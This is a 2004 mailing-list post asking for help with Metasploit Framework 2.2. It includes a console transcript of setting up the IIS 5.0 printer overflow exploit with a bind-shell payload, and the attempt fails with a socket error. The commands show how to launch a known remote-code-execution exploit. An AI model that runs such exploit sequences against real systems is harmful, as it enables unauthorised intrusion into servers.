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problem metasploit creating socket

From: jasanchezo at (Jose Alejandro Sanchez Ortega)
Date: Tue, 14 Sep 2004 18:13:40 -0500


I am using Mac X 10.3.5 (panther), and I am probing Framework 
Metasploit 2.2 in console mode. When a probe with a IIS 5.5 printer 
overflow and win32_bind and win32_reverse payloads; I have problems at 
the moment creating the shell with the overflow dump:

msf > use iis50_printer_overflow
msf iis50_printer_overflow > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf iis50_printer_overflow(win32_bind) > show targets

Supported Exploit Targets

    0  Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_bind) > set TARGET 0
msf iis50_printer_overflow(win32_bind) > show options

Exploit and Payload Options

   Exploit:    Name      Default    Description
   --------    ------    -------    ------------------
   required    RPORT     80         The target port
   required    RHOST                The target address
   optional    SSL                  Use SSL

   Payload:    Name        Default    Description
   --------    --------    -------    
   required    LPORT       4444       Listening port for bind shell
   optional    EXITFUNC    seh        Exit technique: "process", 
"thread", "seh"

   Target: Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_bind) > set RHOST
msf iis50_printer_overflow(win32_bind) > check
[*] Error creating socket: Connection failed: Invalid argument
msf iis50_printer_overflow(win32_bind) > show options

Exploit and Payload Options

   Exploit:    Name      Default         Description
   --------    ------    ------------    ------------------
   required    RPORT     80              The target port
   required    RHOST    The target address
   optional    SSL                       Use SSL

   Payload:    Name        Default    Description
   --------    --------    -------    
   required    LPORT       4444       Listening port for bind shell
   optional    EXITFUNC    seh        Exit technique: "process", 
"thread", "seh"

   Target: Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Trying Windows 2000 SP0/SP1 using return to esp at 0x732c45f3...
[*] Error creating socket: Connection failed: Invalid argument
[*] Exiting Bind Handler.

msf iis50_printer_overflow(win32_bind) >

Any idea?

P.D.: sorry, I not speak english


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